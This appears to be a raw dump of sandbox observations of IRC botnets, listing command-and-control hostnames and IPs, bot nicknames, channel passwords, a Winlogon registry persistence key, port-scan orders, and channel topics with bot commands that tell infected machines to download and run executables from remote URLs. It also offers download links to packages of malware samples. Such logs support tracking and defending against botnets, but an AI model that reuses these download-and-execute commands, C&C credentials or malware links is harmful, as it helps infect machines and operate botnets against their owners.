Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105]
Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104]
Remote Host Port Number
178.211.56.104 81 ircd here
74.206.242.164 80
NICK [N00_USA_XP_3401546]
PRIVMSG [N00_USA_XP_3401 @ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Random Port Scan started on 174.x.x.x:445 with a delay...
cobain.sdeirc.net (botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
cobain.sdeirc.net DNS_TYPE_A 46.243.8.6
46.243.8.6:4747
Nick: {SwarM}{AUT}{N}405701
Username: 8682
Joined Channel: #CoBaIN with Password GOFK12
Info about hosting: http://whois.domaintools.com/178.211.56.104
around 24 mb exe files
Another malware collection, around 24 MB, is here. Download link: http://e0cc6bdb.theseforums.com
mx207.BLOGSHOTS.ORG(botnet hosted in United States Chicago Hostforweb Inc)
dc.studyingcenter-org.com(botnet hosted in China Beijing Chinanet Hebei Province Network)
dc.studyingcenter-org.com 123.183.217.32
dc.tvteam.info
dc.babypin.net
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman” = c:\RECYCLER\R-1-5-21-1482476501-1644491937-682003330-1013\winfixer.exe
Reads...
bnet.doesntexist.org(botnet hosted in Ecuador Quito Puntonet S.a)
DNS Lookup
Host Name IP Address
xeonbox.homeip.net 200.105.228.106
webcache.dyndns.info 127.0.0.1
bnet.doesntexist.org 200.105.228.106
Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888
Outgoing connection to remote server: webcache.dyndns.info TCP port 8888
Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888
Remote Host Port Number
174.132.221.20 80
200.105.228.106 8888
NICK usr331420
USER root 8 * : some...
urcdw.zavoddebila.com(botnet hosted in United States Fullerton Staminus Communications)
urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38
72.20.14.38:33333
Nick: {NOVA}[USA][XP-SP3]610119
Username: VirUs VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY
Joined Channel: ##Turb0-XXX##
PRIVMSG #d4 :Done..
PRIVMSG #d2 :Done..
Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe”
Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.”
Private Message to Channel ##Turb0-XXX##: “Download...
m3rcil3ss.co.cc(botnet hosted in Turkey Netinternet-net)
m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199
212.252.34.199:6667
Nick: [AUS|XP|620207]
Username: onfkyav
Server Pass: m3rc
Joined Channel: #m3rc with Password kxfcrt
Channel Topic for Channel #m3rc: “.p2p”
Private Message to Channel #m3rc: “[p2p]: Spreading to p2p folders.”
Set by ccc on Tue Dec 28 08:36:24
Private Message to User [AUS|XP|620207]: “VERSION”
Now talking in #2k38
Process Created: Topic is...
pantylost.mooo.com( botnet hosted in China Beijing Chinanet Gansu Province Networ
Botnet C&C irc
pantylost.mooo.com ip: 60.165.98.198 marinehh.twilightparadox.com ip: 60.165.98.198 stockingag.jumpingcrab.com ip: 60.165.98.198 pantylost.crabdance.com ip: 60.165.98.198 addr: onthebreak.UglyAs.com ip: 60.165.98.198 headmefc.AsSexyAs.com ip: 60.165.98.198 computercc.ignorelist.com ip: 60.165.98.198 sandtp.chickenkiller.com ip: 60.165.98.198 greenbarc.IsTheBe.st ip: 60.165.98.198 ringc.strangled.net ip: 60.165.98.198
60.165.98.198:8684
NICK [N00_USA_XP_39922187]
USER SP2-917 * 0 :COMPUTERNAME
Now talking in #blue3
Topic is ‘|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gif...
around 52 mb exe files
Here is another malware package, around 52 MB; inside are multiple malware samples. Download: http://0b975bb5.tinylinks.co